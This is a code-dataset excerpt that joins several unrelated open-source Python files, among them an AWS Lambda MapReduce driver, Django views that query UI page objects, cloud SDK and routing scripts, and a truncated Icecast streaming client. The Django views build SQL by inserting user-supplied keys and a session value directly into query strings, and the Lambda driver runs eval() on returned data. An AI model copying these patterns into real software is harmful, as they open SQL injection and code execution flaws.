"MIT-0"
] | null | null | null | src/python/driver.py | manchann/lambda-refarch-mapreduce | 74eb74aefcb929b2a7542280176b42c947f401bd | [
"MIT-0"
] | 1 | 2020-11-11T02:16:52.000Z | 2020-11-11T02:16:52.000Z | #-*- coding: utf-8 -*-
'''
Driver to start BigLambda Job
* Copyright 2016, Amazon.com, Inc. or its affiliates. All Rights Reserved.
*
* Licensed under the Amazon Software License (the "License").
* You may not use this file except in compliance with the License.
* A copy of the License is located at
*
* http://aws.amazon.com/asl/
*
* or in the "license" file accompanying this file. This file is distributed
* on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
* express or implied. See the License for the specific language governing
* permissions and limitations under the License.
'''
import boto3
import json
import math
import random
import re
from io import StringIO
import sys
import time
import lambdautils
import glob
import subprocess
from multiprocessing.dummy import Pool as ThreadPool
from functools import partial
from botocore.client import Config
# create an S3 session
s3 = boto3.resource('s3')
s3_client = boto3.client('s3')
JOB_INFO = 'jobinfo.json'
### utils ####
# 라이브러리와 코드 zip 패키징
def zipLambda(fname, zipname):
# faster to zip with shell exec
subprocess.call(['zip', zipname] + glob.glob(fname) + glob.glob(JOB_INFO) +
glob.glob("lambdautils.py"))
# S3 Bucket에 file name(key), json(data) 저장
def write_to_s3(bucket, key, data, metadata):
s3.Bucket(bucket).put_object(Key=key, Body=data, Metadata=metadata)
# 실행 중인 job에 대한 정보를 json 으로 로컬에 저장
def write_job_config(job_id, job_bucket, n_mappers, r_func, r_handler):
fname = "jobinfo.json"
with open(fname, 'w') as f:
data = json.dumps({
"jobId": job_id,
"jobBucket" : job_bucket,
"mapCount": n_mappers,
"reducerFunction": r_func,
"reducerHandler": r_handler
}, indent=4)
f.write(data)
######### MAIN #############
## JOB ID 이름을 설정해주세요.
job_id = "bl-release"
# Config 파일
config = json.loads(open('driverconfig.json', 'r').read())
# 1. Driver Job에 대한 설정 파일driverconfig) json 파일의 모든 key-value를 저장
bucket = config["bucket"]
job_bucket = config["jobBucket"]
region = config["region"]
lambda_memory = config["lambdaMemory"] # lambda 실제 메모리
concurrent_lambdas = config["concurrentLambdas"] # 동시 실행 가능 수
lambda_read_timeout = config["lambda_read_timeout"]
boto_max_connections = config["boto_max_connections"]
# Lambda의 결과를 읽기 위한 timeout을 길게, connections pool을 많이 지정합니다.
lambda_config = Config(read_timeout=lambda_read_timeout, max_pool_connections=boto_max_connections)
lambda_client = boto3.client('lambda', config=lambda_config)
# prefix와 일치하는 모든 S3 bucket의 key를 가져옵니다.
all_keys = []
for obj in s3.Bucket(bucket).objects.filter(Prefix=config["prefix"]).all():
all_keys.append(obj)
bsize = lambdautils.compute_batch_size(all_keys, lambda_memory, concurrent_lambdas)
batches = lambdautils.batch_creator(all_keys, bsize)
n_mappers = len(batches) # 최종적으로 구한 batches의 개수가 mapper로 결정
# 2. Lambda Function 을 생성합니다.
L_PREFIX = "BL"
# Lambda Functions 이름을 지정합니다.
mapper_lambda_name = L_PREFIX + "-mapper-" + job_id;
reducer_lambda_name = L_PREFIX + "-reducer-" + job_id;
rc_lambda_name = L_PREFIX + "-rc-" + job_id;
# Job 환경 설정을 json으로 파일 씁니다.
write_job_config(job_id, job_bucket, n_mappers, reducer_lambda_name, config["reducer"]["handler"]);
# 각 mapper와 reducer와 coordinator의 lambda_handler 코드를 패키징하여 압축합니다.
zipLambda(config["mapper"]["name"], config["mapper"]["zip"])
zipLambda(config["reducer"]["name"], config["reducer"]["zip"])
zipLambda(config["reducerCoordinator"]["name"], config["reducerCoordinator"]["zip"])
# Mapper를 Lambda Function에 등록합니다.
l_mapper = lambdautils.LambdaManager(lambda_client, s3_client, region, config["mapper"]["zip"], job_id,
mapper_lambda_name, config["mapper"]["handler"])
l_mapper.update_code_or_create_on_noexist()
# Reducer를 Lambda Function에 등록합니다.
l_reducer = lambdautils.LambdaManager(lambda_client, s3_client, region, config["reducer"]["zip"], job_id,
reducer_lambda_name, config["reducer"]["handler"])
l_reducer.update_code_or_create_on_noexist()
# Coordinator를 Lambda Function에 등록합니다.
l_rc = lambdautils.LambdaManager(lambda_client, s3_client, region, config["reducerCoordinator"]["zip"], job_id,
rc_lambda_name, config["reducerCoordinator"]["handler"])
l_rc.update_code_or_create_on_noexist()
# Coordinator에 작업을 할 Bucket에 대한 권한(permission)을 부여합니다.
l_rc.add_lambda_permission(random.randint(1,1000), job_bucket)
# Coordinator에 작업을 할 Bucket에 대한 알림(notification)을 부여합니다.
l_rc.create_s3_eventsource_notification(job_bucket)
# 실행 중인 job에 대한 정보를 json 으로 S3에 저장
j_key = job_id + "/jobdata"
data = json.dumps({
"mapCount": n_mappers,
"totalS3Files": len(all_keys),
"startTime": time.time()
})
write_to_s3(job_bucket, j_key, data, {})
######## MR 실행 ########
mapper_outputs = []
# 3. Invoke Mappers
def invoke_lambda(batches, m_id):
'''
Lambda 함수를 호출(invoke) 합니다.
'''
batch = [k.key for k in batches[m_id-1]]
resp = lambda_client.invoke(
FunctionName = mapper_lambda_name,
InvocationType = 'RequestResponse',
Payload = json.dumps({
"bucket": bucket,
"keys": batch,
"jobBucket": job_bucket,
"jobId": job_id,
"mapperId": m_id
})
)
out = eval(resp['Payload'].read())
mapper_outputs.append(out)
print("mapper output", out)
# 병렬 실행 Parallel Execution
print("# of Mappers ", n_mappers)
pool = ThreadPool(n_mappers)
Ids = [i+1 for i in range(n_mappers)]
invoke_lambda_partial = partial(invoke_lambda, batches)
# Mapper의 개수 만큼 요청 Request Handling
mappers_executed = 0
while mappers_executed < n_mappers:
nm = min(concurrent_lambdas, n_mappers)
results = pool.map(invoke_lambda_partial, Ids[mappers_executed: mappers_executed + nm])
mappers_executed += nm
pool.close()
pool.join()
print("all the mappers finished ...")
# Mapper Lambda function 삭제
# l_mapper.delete_function()
# 실제 Reduce 호출은 reducerCoordinator에서 실행
# 실행 시간을 이용해 대략적인 비용을 계산합니다.
total_lambda_secs = 0
total_s3_get_ops = 0
total_s3_put_ops = 0
s3_storage_hours = 0
total_lines = 0
for output in mapper_outputs:
total_s3_get_ops += int(output[0])
total_lines += int(output[1])
total_lambda_secs += float(output[2])
mapper_lambda_time = total_lambda_secs
#Note: Wait for the job to complete so that we can compute total cost ; create a poll every 10 secs
# 모든 reducer의 keys를 가져옵니다.
reducer_keys = []
# Reducer의 전체 실행 시간을 가져옵니다.
reducer_lambda_time = 0
while True:
job_keys = s3_client.list_objects(Bucket=job_bucket, Prefix=job_id)["Contents"]
keys = [jk["Key"] for jk in job_keys]
total_s3_size = sum([jk["Size"] for jk in job_keys])
print("check to see if the job is done")
# check job done
if job_id + "/result" in keys:
print("job done")
reducer_lambda_time += float(s3.Object(job_bucket, job_id + "/result").metadata['processingtime'])
for key in keys:
if "task/reducer" in key:
reducer_lambda_time += float(s3.Object(job_bucket, key).metadata['processingtime'])
reducer_keys.append(key)
break
time.sleep(5)
# S3 Storage 비용 - mapper만 계산합니다.
# 비용은 3 cents/GB/month
s3_storage_hour_cost = 1 * 0.0000521574022522109 * (total_s3_size/1024.0/1024.0/1024.0) # cost per GB/hr
s3_put_cost = len(job_keys) * 0.005/1000 # PUT, COPY, POST, LIST 요청 비용 Request 0.005 USD / request 1000
total_s3_get_ops += len(job_keys)
s3_get_cost = total_s3_get_ops * 0.004/10000 # GET, SELECT, etc 요청 비용 Request 0.0004 USD / request 1000
# 전체 Lambda 비용 계산
# Lambda Memory 1024MB cost Request 100ms : 0.000001667 USD
total_lambda_secs += reducer_lambda_time
lambda_cost = total_lambda_secs * 0.00001667 * lambda_memory / 1024.0
s3_cost = (s3_get_cost + s3_put_cost + s3_storage_hour_cost)
# Cost 출력
#print "Reducer Lambda Cost", reducer_lambda_time * 0.00001667 * lambda_memory/ 1024.0
print("Mapper Execution Time", mapper_lambda_time)
print("Reducer Execution Time", reducer_lambda_time)
print("Tota Lambda Execution Time", total_lambda_secs)
print("Lambda Cost", lambda_cost)
print("S3 Storage Cost", s3_storage_hour_cost)
print("S3 Request Cost", s3_get_cost + s3_put_cost )
print("S3 Cost", s3_cost )
print("Total Cost: ", lambda_cost + s3_cost)
print("Total Latency: ", total_lambda_secs)
print("Result Output Lines:", total_lines)
# Reducer Lambda function 삭제
# l_reducer.delete_function()
# l_rc.delete_function()
| 32.366038 | 111 | 0.704792 |
75c763241e9151f3dcb2863eac573651f186b3ab | 6,116 | py | Python | AutotestWebD/apps/ui_main/views/page_object.py | yangjourney/sosotest | 2e88099a829749910ca325253c9b1a2e368d21a0 | [
"MIT"
] | 422 | 2019-08-18T05:04:20.000Z | 2022-03-31T06:49:19.000Z | AutotestWebD/apps/ui_main/views/page_object.py | LinSongJian1985/sosotest | 091863dee531b5726650bb63efd6f169267cbeb4 | [
"MIT"
] | 10 | 2019-10-24T09:55:38.000Z | 2021-09-29T17:28:43.000Z | AutotestWebD/apps/ui_main/views/page_object.py | LinSongJian1985/sosotest | 091863dee531b5726650bb63efd6f169267cbeb4 | [
"MIT"
] | 202 | 2019-08-18T05:04:27.000Z | 2022-03-30T05:57:18.000Z | from apps.common.func.CommonFunc import *
from apps.common.func.LanguageFunc import *
from django.shortcuts import render, HttpResponse
from urllib import parse
from apps.common.config import commonWebConfig
from apps.common.func.WebFunc import *
from apps.ui_globals.services.global_textService import global_textService
from apps.config.services.serviceConfService import ServiceConfService
import json
from apps.version_manage.services.common_service import VersionService
def showPOindex(request):
langDict = getLangTextDict(request)
context = {}
context["uiPageObjectIndex"] = "current-page"
context["userName"] = request.session.get("userName")
if not isRelease:
context["env"] = "test"
# 文本
text = {}
text["pageTitle"] = langDict["ui"]["pageObjectMain"]
text["subPageTitle"] = langDict["ui"]["pageObjectCheck"]
context["text"] = text
# context.update(getHttpConfForUI())
context["page"] = 1
return render(request, "ui_main/page_object/page_object_index.html", context)
def queryPageObjects(request):
page = request.POST.get("page")
if isInt(page):
page = int(page)
else:
return HttpResponse("<script>alert('请验证页数参数');</script>")
checkArr = json.loads(parse.unquote(request.POST.get("queryArr")))
orderBy = request.POST.get("orderBy")
if isSqlInjectable(orderBy):
return HttpResponse("<script>alert('查询条件非法');</script>")
#根据版本判断应该从哪个表里取数据 王吉亮添加于20180224
if VersionService.isCurrentVersion(request):
tbName = "tb3_ui_page_object"
versionCondition = ""
else:
tbName = "tb_version_global_vars"
versionCondition = "and versionName='%s'" % request.session.get("version")
execSql = "SELECT g.*,u.userName FROM %s g LEFT JOIN tb_user u ON g.addBy = u.loginName WHERE 1=1 AND g.state=1 %s " % (tbName,versionCondition)
checkList = []
for key in checkArr:
if checkArr[key] == "":
continue
elif key == "addBy":
checkList.append("%%%s%%" % checkArr[key])
checkList.append("%%%s%%" % checkArr[key])
execSql += """ and (g.addBy LIKE %s or u.userName LIKE %s) """
continue
checkList.append("%%%s%%" % checkArr[key])
execSql += """ and g.%s """ % key
execSql += """ LIKE %s"""
execSql += """ ORDER BY %s""" % orderBy
context = pagination(sqlStr=execSql, attrList=checkList, page=page, pageNum=commonWebConfig.testCasePageNum)
context.update(getHttpConfForUI())
response = render(request, "ui_main/page_object/SubPages/page_object_list_subpage.html", context)
return response
def addPOindex(request):
langDict = getLangTextDict(request)
context = {}
context["uiPageObjectAdd"] = "current-page"
context["userName"] = request.session.get("userName")
if not isRelease:
context["env"] = "test"
# 文本
text = {}
text["pageTitle"] = langDict["web"]["httpUserCenterGlobalTextPageTitle"]
text["subPageTitle"] = langDict["web"]["httpUserCenterGlobalTextSubPageTitle"]
context["text"] = text
context.update(getHttpConfForUI())
context["page"] = 1
# return render(request, "ui_main/page_object/page_object_add.html", context)
return render(request, "ui_main/page_object/page_object_conf.html", context)
def queryPageObjectsList(request):
page = request.POST.get("page")
if isInt(page):
page = int(page)
else:
return HttpResponse("<script>alert('请验证页数参数');</script>")
checkArr = json.loads(parse.unquote(request.POST.get("queryArr")))
orderBy = request.POST.get("orderBy")
if isSqlInjectable(orderBy):
return HttpResponse("<script>alert('查询条件非法');</script>")
#根据版本判断应该从哪个表里取数据 王吉亮添加于20180224
if VersionService.isCurrentVersion(request):
tbName = "tb3_ui_page_object"
versionCondition = ""
else:
tbName = "tb_version_global_vars"
versionCondition = "and versionName='%s'" % request.session.get("version")
# execSql = "SELECT g.*,u.userName FROM %s g LEFT JOIN tb_user u ON g.addBy = u.loginName WHERE 1=1 AND g.state=1 %s " % (tbName,versionCondition)
execSql = "SELECT u.* from tb_ui_page_object u WHERE 1=1 "
checkList = []
for key in checkArr:
if checkArr[key] == "":
continue
# elif key == "addBy":
# checkList.append("%%%s%%" % checkArr[key])
# checkList.append("%%%s%%" % checkArr[key])
# execSql += """ and (g.addBy LIKE %s or u.userName LIKE %s) """
#
# continue
checkList.append("%%%s%%" % checkArr[key])
execSql += """ and g.%s """ % key
execSql += """ LIKE %s"""
execSql += """ ORDER BY %s""" % orderBy
context = pagination(sqlStr=execSql, attrList=checkList, page=page, pageNum=commonWebConfig.testCasePageNum)
context.update(getHttpConfForUI())
response = render(request, "ui_main/page_object/subPages/page_object_add_subpage.html", context)
return response
def queryText(request):
page = request.POST.get("page")
if isInt(page):
page = int(page)
else:
return HttpResponse("<script>alert('请验证页数参数');</script>")
checkArr = json.loads(parse.unquote(request.POST.get("queryArr")))
orderBy = request.POST.get("orderBy")
if isSqlInjectable(orderBy):
return HttpResponse("<script>alert('查询条件非法');</script>")
execSql = "SELECT g.* from tb_ui_page_object g WHERE 1=1 "
checkList = []
for key in checkArr:
if checkArr[key] == "":
continue
checkList.append("%%%s%%" % checkArr[key])
execSql += """ and g.%s """ % key
execSql += """ LIKE %s"""
execSql += """ ORDER BY %s""" % orderBy
print("execSql:", execSql)
print("22222222222222222222")
context = pagination(sqlStr=execSql, attrList=checkList, page=page, pageNum=commonWebConfig.testCasePageNum)
print("33333333333333333333333")
response = render(request, "ui_main/page_object/SubPages/page_object_conf_sub_page.html", context)
return response | 37.292683 | 150 | 0.65206 |
f2daa1601668f341063ec5a544ecc640ce8a4664 | 2,100 | py | Python | aliyun-python-sdk-ecs/aliyunsdkecs/request/v20140526/CancelAutoSnapshotPolicyRequest.py | yndu13/aliyun-openapi-python-sdk | 12ace4fb39fe2fb0e3927a4b1b43ee4872da43f5 | [
"Apache-2.0"
] | 1,001 | 2015-07-24T01:32:41.000Z | 2022-03-25T01:28:18.000Z | aliyun-python-sdk-ecs/aliyunsdkecs/request/v20140526/CancelAutoSnapshotPolicyRequest.py | yndu13/aliyun-openapi-python-sdk | 12ace4fb39fe2fb0e3927a4b1b43ee4872da43f5 | [
"Apache-2.0"
] | 363 | 2015-10-20T03:15:00.000Z | 2022-03-08T12:26:19.000Z | aliyun-python-sdk-ecs/aliyunsdkecs/request/v20140526/CancelAutoSnapshotPolicyRequest.py | yndu13/aliyun-openapi-python-sdk | 12ace4fb39fe2fb0e3927a4b1b43ee4872da43f5 | [
"Apache-2.0"
] | 682 | 2015-09-22T07:19:02.000Z | 2022-03-22T09:51:46.000Z | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from aliyunsdkcore.request import RpcRequest
from aliyunsdkecs.endpoint import endpoint_data
class CancelAutoSnapshotPolicyRequest(RpcRequest):
def __init__(self):
RpcRequest.__init__(self, 'Ecs', '2014-05-26', 'CancelAutoSnapshotPolicy','ecs')
self.set_method('POST')
if hasattr(self, "endpoint_map"):
setattr(self, "endpoint_map", endpoint_data.getEndpointMap())
if hasattr(self, "endpoint_regional"):
setattr(self, "endpoint_regional", endpoint_data.getEndpointRegional())
def get_ResourceOwnerId(self): # Long
return self.get_query_params().get('ResourceOwnerId')
def set_ResourceOwnerId(self, ResourceOwnerId): # Long
self.add_query_param('ResourceOwnerId', ResourceOwnerId)
def get_diskIds(self): # String
return self.get_query_params().get('diskIds')
def set_diskIds(self, diskIds): # String
self.add_query_param('diskIds', diskIds)
def get_ResourceOwnerAccount(self): # String
return self.get_query_params().get('ResourceOwnerAccount')
def set_ResourceOwnerAccount(self, ResourceOwnerAccount): # String
self.add_query_param('ResourceOwnerAccount', ResourceOwnerAccount)
def get_OwnerId(self): # Long
return self.get_query_params().get('OwnerId')
def set_OwnerId(self, OwnerId): # Long
self.add_query_param('OwnerId', OwnerId)
| 38.888889 | 83 | 0.765714 |
c2df9bcff3455b55de162e28eebf3760322e2b67 | 412 | py | Python | uscis_service/src/constants.py | FrenchCommando/uscis-status | 34b9a5db38130d595d3c3889a764e7c134d2287b | [
"MIT"
] | 4 | 2020-05-18T14:45:20.000Z | 2021-08-24T19:43:17.000Z | uscis_service/src/constants.py | FrenchCommando/uscis-status | 34b9a5db38130d595d3c3889a764e7c134d2287b | [
"MIT"
] | null | null | null | uscis_service/src/constants.py | FrenchCommando/uscis-status | 34b9a5db38130d595d3c3889a764e7c134d2287b | [
"MIT"
] | 1 | 2020-05-18T01:26:19.000Z | 2020-05-18T01:26:19.000Z | import os
IS_DOCKER = os.environ.get('AM_I_IN_A_DOCKER_CONTAINER', False)
uscis_database = "uscis"
uscis_table_name = "uscis_table"
error_table_name = "error_table"
host = "db" if IS_DOCKER else "localhost"
host_uscis_service = "uscis_service" if IS_DOCKER else "localhost"
pg_port_number = 5432 # port of pg service
port_number = 5000 # port to host server
port_number_dash = 8050 # port to host server
| 25.75 | 66 | 0.771845 |
de4821f5843be5f3890a4d07363013fa5996c916 | 1,682 | py | Python | config/urls.py | eziolevine/openstage | 25136f0b8d8440eddcd50547aad6c117b8c85393 | [
"BSD-3-Clause"
] | null | null | null | config/urls.py | eziolevine/openstage | 25136f0b8d8440eddcd50547aad6c117b8c85393 | [
"BSD-3-Clause"
] | null | null | null | config/urls.py | eziolevine/openstage | 25136f0b8d8440eddcd50547aad6c117b8c85393 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.conf import settings
from django.conf.urls import include, url
from django.conf.urls.static import static
from django.contrib import admin
from django.views.generic import TemplateView
from django.views import defaults as default_views
from openstage.interviews.views import InterviewListView
urlpatterns = [
url(r'^$', InterviewListView.as_view(), name="home"),
url(r'^about/$', TemplateView.as_view(template_name='pages/about.html'), name="about"),
url(r'^grappelli/', include('grappelli.urls')), # grappelli URLS
# Django Admin, use {% url 'admin:index' %}
url(settings.ADMIN_URL, include(admin.site.urls)),
# User management
url(r'^users/', include("openstage.users.urls", namespace="users")),
url(r'^accounts/', include('allauth.urls')),
url(r'^interviews/', include('openstage.interviews.urls')),
# Your stuff: custom urls includes go here
] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
if settings.DEBUG:
# This allows the error pages to be debugged during development, just visit
# these url in browser to see how these error pages look like.
urlpatterns += [
url(r'^400/$', default_views.bad_request, kwargs={'exception': Exception("Bad Request!")}),
url(r'^403/$', default_views.permission_denied, kwargs={'exception': Exception("Permissin Denied")}),
url(r'^404/$', default_views.page_not_found, kwargs={'exception': Exception("Page not Found")}),
url(r'^500/$', default_views.server_error),
]
urlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)
| 43.128205 | 109 | 0.712842 |
f45ddd5ef20bbe0e8194451a1317e7f5f86235a5 | 437 | py | Python | quadratic.py | DariaMagarshak/python_training | 03c2c5c879db6c65ed3ca8453b8b2c0c8b033dc1 | [
"Apache-2.0"
] | null | null | null | quadratic.py | DariaMagarshak/python_training | 03c2c5c879db6c65ed3ca8453b8b2c0c8b033dc1 | [
"Apache-2.0"
] | null | null | null | quadratic.py | DariaMagarshak/python_training | 03c2c5c879db6c65ed3ca8453b8b2c0c8b033dc1 | [
"Apache-2.0"
] | null | null | null | from math import sqrt
def solve(a, b, c):
d = b*b - 4*a*c
if d < 0:
print("No solutions")
elif d == 0:
x = -b / (2*a)
print("One solution" + str(x))
elif d > 0:
x1 = (-b + sqrt(d)) / (2*a)
x2 = (-b - sqrt(d)) / (2 * a)
print("Two solutions" + str(x1) + " and" + str(x2))
else:
print("A-A-A!!")
solve(1, 1, 1)
solve(1, 2, 1)
solve(1, 5, 6) | 21.85 | 63 | 0.405034 |
2b1b9578bd49eb0a7582ca410606520ea73e767a | 3,287 | py | Python | python/example_code/set-routetb-multilb.py | nifcloud/nifcloud-sample | 336773d8f0a2fb842fc20bb33da9ba83c5ed4457 | [
"Apache-2.0"
] | null | null | null | python/example_code/set-routetb-multilb.py | nifcloud/nifcloud-sample | 336773d8f0a2fb842fc20bb33da9ba83c5ed4457 | [
"Apache-2.0"
] | 3 | 2022-01-21T14:07:01.000Z | 2022-01-24T02:11:05.000Z | python/example_code/set-routetb-multilb.py | nifcloud/nifcloud-sample | 336773d8f0a2fb842fc20bb33da9ba83c5ed4457 | [
"Apache-2.0"
] | null | null | null | from nifcloud import session
import sys
# --- define --------
# -- MULTILB Name -------
MULTILB_NAME = "web"
MULTILB_WAIT_PORT = 8080
MULTILB_TARGET_PORT = 80
MULTILB_PROTOCOL = 'HTTP'
# --------------------
# -- Routing Info --------
TARGET_CIDER = '10.2.3.0/24'
TARGET_NEXTHOP = '10.4.4.1'
# --------------------
# -------------------
# ----- Add Route Table Multi Load Balancer ----------------
def create_multi_lb(client):
try:
# Create Route Table
route_table = client.create_route_table()
# add Routing Info
"""
┃
┏━┻━━┓
┃MultiLB ┃
┗━┳━━┛
┏━━━┻━━━━┓
┃ ┃
IpAddress ┏━┻━━━━━━━━━┓
┏━━━━━━━━━━┓┃Network ┃
┃DestinationCidrBlock┃┃(DestinationCidrBlock)┃
┗━━━━━━━━━━┛┗━━━━━━━━━━━┛
client.create_route(
# Target RouteTable
RouteTableId='string',
# Destination IP Range(CIDR)
DestinationCidrBlock='string',
# Set either NetworkName or NetworkId or IpAddress
# Next Hop Ipaddress
IpAddress='string',
# Target Private LAN ID
NetworkId='string',
# Target Private LAN Name
NetworkName='string',
)
"""
result = client.create_route(
# Target RouteTable
RouteTableId=route_table['RouteTable']['RouteTableId'],
# Destination IP Range(CIDR)
DestinationCidrBlock=TARGET_CIDER,
# Set either NetworkName or NetworkId or IpAddress
# Next Hop Ipaddress
IpAddress=TARGET_NEXTHOP,
)
if not result['Return']:
print("Add Route Error")
sys.exit(1)
# Get Multl Load Balancer ID
mlb = client.nifty_describe_elastic_load_balancers(
ElasticLoadBalancers={
'ListOfRequestElasticLoadBalancerName': [
MULTILB_NAME,
],
'ListOfRequestElasticLoadBalancerPort': [
MULTILB_WAIT_PORT,
],
'ListOfRequestInstancePort': [
MULTILB_TARGET_PORT,
],
'ListOfRequestProtocol': [
MULTILB_PROTOCOL,
]
}
)
mlb_id = \
mlb['NiftyDescribeElasticLoadBalancersResult']['ElasticLoadBalancerDescriptions'][0]['ElasticLoadBalancerId']
# Set Route Table
result = \
client.nifty_associate_route_table_with_elastic_load_balancer(
ElasticLoadBalancerId=mlb_id,
RouteTableId=route_table['RouteTable']['RouteTableId'],
)
if not result['Return']:
print("Set Route Table Error")
sys.exit(1)
except Exception as e:
print("exception :", e, "\nin :", sys._getframe().f_code.co_name)
sys.exit(1)
# -------------- main ----------------
client = session.get_session().create_client(
"computing",
region_name="jp-east-2",
)
create_multi_lb(client)
| 30.719626 | 121 | 0.485549 |
680e62c9c5000846401236876454cb6012fe83fc | 587 | py | Python | helpers/admins.py | Goswamiroyal/Miss_fruity_music- | b172b6854acfcb828ac2928b7c9b019c91da58b1 | [
"MIT"
] | 23 | 2021-09-14T11:36:24.000Z | 2022-03-22T09:55:05.000Z | helpers/admins.py | Goswamiroyal/Miss_fruity_music- | b172b6854acfcb828ac2928b7c9b019c91da58b1 | [
"MIT"
] | null | null | null | helpers/admins.py | Goswamiroyal/Miss_fruity_music- | b172b6854acfcb828ac2928b7c9b019c91da58b1 | [
"MIT"
] | 54 | 2021-09-14T16:10:35.000Z | 2022-03-25T19:21:11.000Z | import cache.admins
from typing import List
from pyrogram.types import Chat
from cache.admins import get as gett
from cache.admins import set
async def get_administrators(chat: Chat) -> List[int]:
get = gett(chat.id)
if get:
return get
else:
administrators = await chat.get_members(filter="administrators")
to_set = []
for administrator in administrators:
if administrator.can_manage_voice_chats:
to_set.append(administrator.user.id)
set(chat.id, to_set)
return await get_administrators(chat)
| 24.458333 | 72 | 0.678024 |
29279cad67279ea941da539d8cdeec8d03fb403f | 1,677 | py | Python | Base/BaseTempFolder.py | SamanFekri/BookRecommendation | 07dfa875154af39546cb263d4407339ce26d47e8 | [
"MIT"
] | null | null | null | Base/BaseTempFolder.py | SamanFekri/BookRecommendation | 07dfa875154af39546cb263d4407339ce26d47e8 | [
"MIT"
] | null | null | null | Base/BaseTempFolder.py | SamanFekri/BookRecommendation | 07dfa875154af39546cb263d4407339ce26d47e8 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on 19/06/2019
@author: Maurizio Ferrari Dacrema
"""
from Base.Recommender_utils import get_unique_temp_folder
import os, shutil
class BaseTempFolder(object):
def __init__(self):
super(BaseTempFolder, self).__init__()
self.DEFAULT_TEMP_FILE_FOLDER = './result_experiments/__Temp_{}/'.format(self.RECOMMENDER_NAME)
def _get_unique_temp_folder(self, input_temp_file_folder = None):
if input_temp_file_folder is None:
print("{}: Using default Temp folder '{}'".format(self.RECOMMENDER_NAME, self.DEFAULT_TEMP_FILE_FOLDER))
self._use_default_temp_folder = True
output_temp_file_folder = get_unique_temp_folder(self.DEFAULT_TEMP_FILE_FOLDER)
else:
print("{}: Using Temp folder '{}'".format(self.RECOMMENDER_NAME, input_temp_file_folder))
self._use_default_temp_folder = False
output_temp_file_folder = get_unique_temp_folder(input_temp_file_folder)
if not os.path.isdir(output_temp_file_folder):
os.makedirs(output_temp_file_folder)
return output_temp_file_folder
def _clean_temp_folder(self, temp_file_folder):
"""
Clean temporary folder only if the default one
:return:
"""
if self._use_default_temp_folder:
print("{}: Cleaning temporary files from '{}'".format(self.RECOMMENDER_NAME, temp_file_folder))
shutil.rmtree(temp_file_folder, ignore_errors=True)
else:
print("{}: Maintaining temporary files due to a custom temp folder being selected".format(self.RECOMMENDER_NAME))
| 32.25 | 125 | 0.692904 |
5b24933966691e5d41acff47087e140eff99ee11 | 8,519 | py | Python | Sketches/RJL/HTTP/IcecastClient.py | sparkslabs/kamaelia_orig | 24b5f855a63421a1f7c6c7a35a7f4629ed955316 | [
"Apache-2.0"
] | 12 | 2015-10-20T10:22:01.000Z | 2021-07-19T10:09:44.000Z | Sketches/RJL/HTTP/IcecastClient.py | sparkslabs/kamaelia_orig | 24b5f855a63421a1f7c6c7a35a7f4629ed955316 | [
"Apache-2.0"
] | 2 | 2015-10-20T10:22:55.000Z | 2017-02-13T11:05:25.000Z | Sketches/RJL/HTTP/IcecastClient.py | sparkslabs/kamaelia_orig | 24b5f855a63421a1f7c6c7a35a7f4629ed955316 | [
"Apache-2.0"
] | 6 | 2015-03-09T12:51:59.000Z | 2020-03-01T13:06:21.000Z | # -*- coding: utf-8 -*-
# Copyright 2010 British Broadcasting Corporation and Kamaelia Contributors(1)
#
# (1) Kamaelia Contributors are listed in the AUTHORS file and at
# http://www.kamaelia.org/AUTHORS - please extend this file,
# not this notice.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""\
===================
Icecast/SHOUTcast MP3 streaming client
===================
This component uses HTTP to stream MP3 audio from a SHOUTcast/Icecast server.
Example Usage
-------------
IcecastClient fetches the combined audio and metadata stream from the
HTTP server hosting the stream. IcecastDemux separates the audio data
from the metadata in stream and IcecastStreamWriter writes the audio
data to disk (discarding metadata).
pipeline(
IcecastClient("http://64.236.34.97:80/stream/1049"),
IcecastDemux(),
IcecastStreamWriter("stream.mp3"),
).run()
How does it work?
-----------------
The SHOUTcast protocol is virtually identical to HTTP. As such, IcecastClient
subclasses SingleShotHTTPClient modifying the request slightly to ask for
stream metadata(e.g. track name) to be included (by adding the icy-metadata header).
It is otherwise identical to its parent class.
"""
from Axon.Component import component
from Axon.Ipc import producerFinished, shutdownMicroprocess, shutdown
from Kamaelia.Internet.TCPClient import TCPClient
from Kamaelia.Util.Console import ConsoleReader, ConsoleEchoer
import string, time
from HTTPParser import *
from HTTPClient import *
def intval(mystring):
try:
retval = int(mystring)
except ValueError:
retval = None
except TypeError:
retval = None
return retval
def removeTrailingCr(line):
if len(line) == 0:
return ""
elif line[-1] == "\r":
return line[0:-1]
else:
return line
class IceIPCHeader(object):
def __init__(self, contenttype):
self.contenttype = contenttype
class IceIPCMetadata(object):
def __init__(self, metadata):
self.metadata = metadata
class IceIPCDataChunk(object):
def __init__(self, data):
self.data = data
class IceIPCDisconnected(object):
pass
class IcecastDemux(component):
"""Splits an Icecast stream into A/V data and metadata"""
def dictizeMetadata(self, metadata):
#print "IcecastClient.dictizeMetadata()"
#format:
#StreamUrl='www.example.com';
#StreamTitle='singer, title';
lines = metadata.split(";")
metadict = {}
for line in lines:
splitline = line.split("=",1)
if len(splitline) > 1:
key = splitline[0]
val = splitline[1]
if val[:1] == "\n":
val = val[1:]
if val[0:1] == "'" and val[-1:] == "'":
val = val[1:-1]
metadict[key] = val
return metadict
def main(self):
